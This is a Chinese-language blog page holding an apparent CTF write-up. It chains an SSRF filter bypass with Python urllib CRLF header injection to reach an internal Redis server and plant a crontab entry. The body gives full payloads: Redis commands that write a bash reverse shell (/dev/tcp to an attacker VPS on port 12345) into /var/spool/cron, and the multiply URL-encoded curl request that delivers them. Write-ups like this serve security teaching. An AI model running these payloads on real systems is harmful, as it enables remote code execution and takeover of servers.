<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="write-up," />





  <link rel="alternate" href="/atom.xml" title="4ct10n's Blog" type="application/atom+xml" />






<meta name="description" content="本篇文章带来的是python低版本的urllib 头部注入，攻击目标为局域网内的Redis，结合着一道CTF实例，演示整个攻击过程">
<meta name="keywords" content="write-up">
<meta property="og:type" content="article">
<meta property="og:title" content="Hack Redis via Python urllib HTTP Header Injection">
<meta property="og:url" content="http://yoursite.com/2017/06/16/Hack Redis via Python urllib HTTP Header Injection/index.html">
<meta property="og:site_name" content="4ct10n&#39;s Blog">
<meta property="og:description" content="本篇文章带来的是python低版本的urllib 头部注入，攻击目标为局域网内的Redis，结合着一道CTF实例，演示整个攻击过程">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://img.blog.csdn.net/20170616004313699?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616010427229?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616010648352?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616010827953?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616010952682?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616011230120?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616014958229?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616015042229?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616015131715?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616020355536?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:image" content="http://img.blog.csdn.net/20170616020911274?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">
<meta property="og:updated_time" content="2017-10-22T02:14:27.639Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Hack Redis via Python urllib HTTP Header Injection">
<meta name="twitter:description" content="本篇文章带来的是python低版本的urllib 头部注入，攻击目标为局域网内的Redis，结合着一道CTF实例，演示整个攻击过程">
<meta name="twitter:image" content="http://img.blog.csdn.net/20170616004313699?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2017/06/16/Hack Redis via Python urllib HTTP Header Injection/"/>





  <title>Hack Redis via Python urllib HTTP Header Injection | 4ct10n's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">4ct10n's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-schedule">
          <a href="/schedule/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br />
            
            日程表
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br />
            
            站点地图
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            公益404
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2017/06/16/Hack Redis via Python urllib HTTP Header Injection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="4ct10n">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/qq.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="4ct10n's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Hack Redis via Python urllib HTTP Header Injection</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-06-16T00:39:00+08:00">
                2017-06-16
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2017-10-22T10:14:27+08:00">
                2017-10-22
              </time>
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本篇文章带来的是python低版本的urllib 头部注入，攻击目标为局域网内的Redis，结合着一道CTF实例，演示整个攻击过程<br><a id="more"></a></p>
<p><link rel="stylesheet" type="text/css" href="http://static.blog.csdn.net/css/csdn_blog_detail.min.css"></p>
<div class="markdown_views"><blockquote><br><p>本篇文章带来的是python低版本的urllib 头部注入，攻击目标为局域网内的Redis，结合着一道CTF实例，演示整个攻击过程</p><br></blockquote><br><p><div class="toc"><div class="toc"><br><ul><br><li><a href="#0x01-简介">0x01 简介</a></li><br><li><a href="#0x02-环境搭建">0x02 环境搭建</a></li><br><li><a href="#0x03-题目分析">0x03 题目分析</a><ul><br><li><a href="#0x1-ssrf">0x1 ssrf</a></li><br><li><a href="#0x2-python-urllib-注入">0x2 python urllib 注入</a><ul><br><li><a href="#1-docker-1">docker 1</a></li><br><li><a href="#2docker-2">docker 2</a></li><br></ul><br></li><br><li><a href="#0x3-redis攻击方式">0x3 redis攻击方式</a><ul><br><li><a href="#1webshell">webshell</a></li><br><li><a href="#2利用redis写恶意命令">利用redis写恶意命令</a></li><br><li><a href="#3接收反弹的shell">接收反弹的shell</a></li><br></ul><br></li><br></ul><br></li><br></ul><br></div><br></div><br></p><br><h1 id="0x01-简介">0x01 简介</h1><br><p>2016年6月BLINDSPOT披露了Python urllib http头注入漏洞：<a href="http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html" target="_blank" rel="external">http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html</a> <br><br>通过这个漏洞，如果使用了Python的urllib库，并且请求的url为用户可控，那么就可能存在内网被探测的风险，如果本机或内网服务器中装有未授权访问的redis，那么服务器则有被getshell的风险。<br></p><br><h1 id="0x02-环境搭建">0x02 环境搭建</h1><br><blockquote><br><p>利用2016hctf ATfeild 源码搭建 <br><br><a href="https://github.com/LoRexxar/hctf2016_atfield" target="_blank" rel="external">https://github.com/LoRexxar/hctf2016_atfield</a><br></p><br></blockquote><br><table><br><thead><br><tr><br><th>主机</th><br><th>ip</th><br><th>配置</th><br></tr><br></thead><br><tbody><tr><br><td>本机</td><br><td>172.17.0.1</td><br><td>Ubuntu:16.04</td><br></tr><br><tr><br><td>docker1</td><br><td>172.17.0.2</td><br><td>Ubuntu:16.04 python2.7.6（源码编译）</td><br></tr><br><tr><br><td>docker2</td><br><td>172.17.0.4</td><br><td>centos:6 redis2.4.3</td><br></tr><br></tbody></table><br><h1 id="0x03-题目分析">0x03 题目分析</h1><br><p>整个题目只有一个输入框 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616004313699?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>要求输入图片的url ，后台的访问过程因该是直接去请求文件 <br><br>打印出来的image地址很可疑 怀疑是ssrf<br><br><br></p><br><p>下一步就是寻找内网主机</p><br><h2 id="0x1-ssrf">0x1 ssrf</h2><br><p>这里我们测试能发现，并不允许ip的请求，也就是描述中所说的，请求必须符合.tld标准并且包含域名，如果想要请求127.0.0.1，我们这里有两种绕过方式</p><br><p>1、 <a href="http://www.127.0.0.1.xip.io" target="_blank" rel="external">http://www.127.0.0.1.xip.io</a></p><br><p>这种方式可以自动把域名指向中间的ip，在一些特殊情况下非常好用</p><br><p>2、 <a href="http://xxxxx/?u=http://127.0.0.1" target="_blank" rel="external">http://xxxxx/?u=http://127.0.0.1</a></p><br><p>在有域名的vps上写一个跳转页面实现，事实上，只有第二种做法可以顺利继续做下一题</p><br><p>这里采用两种方法结合的方式 <br><br>构造<a href="http://www.vps.xip.io/302.php?u=http://127.0.0.1" target="_blank" rel="external">http://www.vps.xip.io/302.php?u=http://127.0.0.1</a><br></p><br><h2 id="0x2-python-urllib-注入">0x2 python urllib 注入</h2><br><p>该漏洞的前提python版本为python3 &lt; 3.4.3 || python2 &lt; 2.7.9 （ps 这里python版本必须是自己编译的，虽然不知道为什么？？？）</p><br><p>首先我们了解一下什么是python urllib 注入</p><br><h3 id="1-docker-1">1. docker 1</h3><br><p>是对外开放的web服务器端 <br><br>编写请求脚本<br></p><br><pre class="prettyprint"><code class=" hljs d"><span class="hljs-shebang">#!/usr/bin/env python                                                       </span><br># encoding: utf-<span class="hljs-number">8</span><br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> urllib2<br>url = sys.argv[<span class="hljs-number">1</span>]<br>info = urllib2.urlopen(url)</code></pre><br><p><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616010427229?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>通过发送请求 达到恶意数据被执行 <br><br><code>python a.py <a href="http://172.17.0.3%0d%0aset%20a%2012345%0d%0a:8888/" target="_blank" rel="external">http://172.17.0.3%0d%0aset%20a%2012345%0d%0a:8888/</a></code> <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616010648352?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>首先在docker2中nc  -lp 8888端口 <br><br>观察现象 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616010827953?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>发现中间的字符串正常的解析了，正好是一组redis命令<br><br><br><br><br><br><br></p><br><h3 id="2docker-2">2.docker 2</h3><br><p>是内网中的服务器，里面有redis以及crontab任务管理 <br><br>docker2中开启了redis服务<br></p><br><p><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616010952682?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""></p><br><p>如果刚才docker1中的请求端口是6379，那么就会吧aa变量加入到集合中，从而能证明header注入redis是否成功 <br><br>最后看截图 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616011230120?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""><br><br></p><br><p>成功解析语句并执行</p><br><h2 id="0x3-redis攻击方式">0x3 redis攻击方式</h2><br><p>首先整体的思路是用户通过操作docker1去访问docker2其中的数据具有恶意性，并且可以在docker2中解析执行，从而在docker2中进行破坏最后拿到webshell，系统管理权限</p><br><h3 id="1webshell">1.webshell</h3><br><p>利用最经典的webshell获取方法 <br><br>通过1.2.2 我们能够绕过过滤，在通过1.2.1我们能够构造payload写入信息redis，再加上提示说有crontab，这样我们就可以通过redis来写crontab文件然后反弹shell。<br></p><br><p>正常我们在bash下反弹shell是这样子的命令</p><br><p><code>/bin/bash -i &gt;&amp; /dev/tcp/ip地址/端口号 0&gt;&amp;1</code> <br><br>写成计划任务形式，即crontab文件形式<br></p><br><p><code><em>/1 </em> <em> </em> <em> /bin/bash -i &gt;&amp; /dev/tcp/ip地址/端口号 0&gt;&amp;1</em></code></p><br><p>代表每分钟执行一次</p><br><h3 id="2利用redis写恶意命令">2.利用redis写恶意命令</h3><br><p>通常来说我们在使用redis写文件方法如下：</p><br><pre class="prettyprint"><code class=" hljs cs"><span class="hljs-keyword">set</span> <span class="hljs-number">11</span> <span class="hljs-string">“/1 <em> </em> <em> </em> /bin/bash -i &gt;&amp; /dev/tcp/ip地址/端口号 0&gt;&amp;1”</span><br>config <span class="hljs-keyword">set</span> dir /<span class="hljs-keyword">var</span>/spool/cron<br>config <span class="hljs-keyword">set</span> dbfilename root<br>save<br></code></pre><br><p>但本题采取了另一个方式 因为redis不会识别空格</p><br><pre class="prettyprint"><code class=" hljs livecodeserver">（<span class="hljs-number">1</span>） <span class="hljs-built_in">set</span> <span class="hljs-number">11</span> <span class="hljs-string">“\n<em>/1 </em> <em> </em> <em> /bin/bash -i &gt;&amp; /dev/tcp/(vps address)/12345 0&gt;&amp;1\n”</em></span>

<span class="hljs-number">3</span>     <span class="hljs-comment"> //表示有三个参数</span><br>$<span class="hljs-number">3</span>    <span class="hljs-comment"> //下面这个参数长度为3</span><br><span class="hljs-built_in">set</span><br>$<span class="hljs-number">1</span>    <span class="hljs-comment"> //下面这个参数长度为1</span><br><span class="hljs-operator">a</span><br>$<span class="hljs-number">64</span>  <span class="hljs-comment"> //下面这个参数长度为64</span><br>\n<em>/<span class="hljs-number">1</span> </em> <em> </em> <em> /bin/bash -i &gt;&amp; /dev/tcp/(vps address)/<span class="hljs-number">12345</span> <span class="hljs-number">0</span>&gt;&amp;<span class="hljs-number">1</span>\n</em></code></pre><br><p>这里\n在传输的时候替换成%0a，所以我们要传入的明文子串如下：</p><br><pre class="prettyprint"><code class=" hljs lasso"><br><span class="hljs-keyword">link</span><span class="hljs-subst">=</span>http:<span class="hljs-comment">//www.(vps address).xip.io/302.php?url=<a href="http://172.17.0.4" target="_blank" rel="external">http://172.17.0.4</a></span><br><span class="hljs-subst"></span><span class="hljs-number">3</span><br>$<span class="hljs-number">3</span><br><span class="hljs-built_in">set</span><br>$<span class="hljs-number">1</span><br>a<br>$<span class="hljs-number">64</span><br><span class="hljs-subst"><em></em></span>/<span class="hljs-number">1</span> <span class="hljs-subst"></span> <span class="hljs-subst"><em></em></span> <span class="hljs-subst"></span> <span class="hljs-subst">*</span> /bin/bash <span class="hljs-attribute">-i</span> <span class="hljs-subst">&gt;&amp;</span> /dev/tcp<span class="hljs-subst">/</span>(vps address)/<span class="hljs-number">12345</span> <span class="hljs-number">0</span><span class="hljs-subst">&gt;&amp;</span><span class="hljs-number">1</span><br>config <span class="hljs-built_in">set</span> dir /<span class="hljs-built_in">var</span>/spool/cron<br>config <span class="hljs-built_in">set</span> dbfilename root<br>save<br>:<span class="hljs-number">6379</span><span class="hljs-subst">/</span></code></pre><br><p>不能直接发送过去 ，首先进行进行URL编码转换，应该转换几次呢？ <br><br>答案是3次 用户web浏览器一次/跳转一次/内网请求一次 <br><br>在换行时必须采用%0d%0a 那么最后的形式是将下面的link再转码两次<br><br></p><br><pre class="prettyprint"><code class=" hljs perl"><span class="hljs-keyword">link</span>=http:<span class="hljs-regexp">//www</span>.(vps address).xip.io/<span class="hljs-number">302</span>.php?url=http:<span class="hljs-regexp">//</span><span class="hljs-number">172.17</span>.<span class="hljs-number">0</span>.<span class="hljs-number">4</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0A</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0A</span><span class="hljs-variable">%2a3</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0A</span><span class="hljs-variable">%243</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0Aset</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0A</span><span class="hljs-variable">%241</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0Aa</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0A</span><span class="hljs-variable">%2464</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0A</span><span class="hljs-variable">%0a</span><span class="hljs-variable">%2a</span><span class="hljs-variable">%2f1</span><span class="hljs-variable">%20</span><span class="hljs-variable">%2a</span><span class="hljs-variable">%20</span><span class="hljs-variable">%2a</span><span class="hljs-variable">%20</span><span class="hljs-variable">%2a</span><span class="hljs-variable">%20</span><span class="hljs-variable">%2a</span><span class="hljs-variable">%20</span><span class="hljs-variable">%2fbin</span><span class="hljs-variable">%2fbash</span><span class="hljs-variable">%20</span>-i<span class="hljs-variable">%20</span><span class="hljs-variable">%3E</span><span class="hljs-variable">%26</span><span class="hljs-variable">%20</span><span class="hljs-variable">%2fdev</span><span class="hljs-variable">%2ftcp</span><span class="hljs-variable">%2f</span>(vps address)<span class="hljs-variable">%2f12345</span><span class="hljs-variable">%200</span><span class="hljs-variable">%3E</span><span class="hljs-variable">%261</span><span class="hljs-variable">%0a</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0Aconfig</span><span class="hljs-variable">%20set</span><span class="hljs-variable">%20dir</span><span class="hljs-variable">%20</span><span class="hljs-variable">%2fvar</span><span class="hljs-variable">%2fspool</span><span class="hljs-variable">%2fcron</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0Aconfig</span><span class="hljs-variable">%20set</span><span class="hljs-variable">%20dbfilename</span><span class="hljs-variable">%20root</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0Asave</span><span class="hljs-variable">%0d</span><span class="hljs-variable">%0A</span>:<span class="hljs-number">6379</span>/</code></pre><br><p>利用crul 方法发送出去</p><br><pre class="prettyprint"><code class=" hljs perl">curl -d <span class="hljs-string">“link=http<span class="hljs-variable">%3A</span><span class="hljs-variable">%2f</span><span class="hljs-variable">%2fwww</span>.(vps address).xip.io<span class="hljs-variable">%2f302</span>.php<span class="hljs-variable">%3Furl</span><span class="hljs-variable">%3Dhttp</span><span class="hljs-variable">%253A</span><span class="hljs-variable">%252f</span><span class="hljs-variable">%252f172</span>.17.0.3<span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250A</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250A</span><span class="hljs-variable">%25252a3</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250A</span><span class="hljs-variable">%2525243</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250Aset</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250A</span><span class="hljs-variable">%2525241</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250Aa</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250A</span><span class="hljs-variable">%25252464</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250A</span><span class="hljs-variable">%25250a</span><span class="hljs-variable">%25252a</span><span class="hljs-variable">%25252f1</span><span class="hljs-variable">%252520</span><span class="hljs-variable">%25252a</span><span class="hljs-variable">%252520</span><span class="hljs-variable">%25252a</span><span class="hljs-variable">%252520</span><span class="hljs-variable">%25252a</span><span class="hljs-variable">%252520</span><span class="hljs-variable">%25252a</span><span class="hljs-variable">%252520</span><span class="hljs-variable">%25252fbin</span><span class="hljs-variable">%25252fbash</span><span class="hljs-variable">%252520</span>-i<span class="hljs-variable">%252520</span><span class="hljs-variable">%25253E</span><span class="hljs-variable">%252526</span><span class="hljs-variable">%252520</span><span class="hljs-variable">%25252fdev</span><span class="hljs-variable">%25252ftcp</span><span class="hljs-variable">%25252f</span>(vps address)<span class="hljs-variable">%25252f12345</span><span class="hljs-variable">%2525200</span><span class="hljs-variable">%25253E</span><span class="hljs-variable">%2525261</span><span class="hljs-variable">%25250a</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250Aconfig</span><span class="hljs-variable">%252520set</span><span class="hljs-variable">%252520dir</span><span class="hljs-variable">%252520</span><span class="hljs-variable">%25252fvar</span><span class="hljs-variable">%25252fspool</span><span class="hljs-variable">%25252fcron</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250Aconfig</span><span class="hljs-variable">%252520set</span><span class="hljs-variable">%252520dbfilename</span><span class="hljs-variable">%252520root</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250Asave</span><span class="hljs-variable">%25250d</span><span class="hljs-variable">%25250A</span><span class="hljs-variable">%253A6379</span><span class="hljs-variable">%252f</span>“</span> <span class="hljs-string">“<a href="http://172.17.0.4:8000/show" target="_blank" rel="external">http://172.17.0.4:8000/show</a>“</span> -v -L</code></pre><br><p>执行结果如下 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616014958229?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616015042229?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br>成功执行 <br><br>观察 redis端的情况 <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616015131715?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""> <br><br><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616020355536?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""><br><br><br><br><br><br></p><br><p>成功实现计划任务的写入 <br><br>下面就是vps接受反弹的shell<br></p><br><h3 id="3接收反弹的shell">3.接收反弹的shell</h3><br><p><img alt="这里写图片描述" src="http://img.blog.csdn.net/20170616020911274?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvcXFfMzE0ODExODc=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast" title=""></p></div>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/write-up/" rel="tag"># write-up</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/06/15/2017 GCTF Web WriteUp/" rel="next" title="2017 GCTF Web WriteUp">
                <i class="fa fa-chevron-left"></i> 2017 GCTF Web WriteUp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/06/16/验证码机制与实现/" rel="prev" title="验证码机制与实现">
                验证码机制与实现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
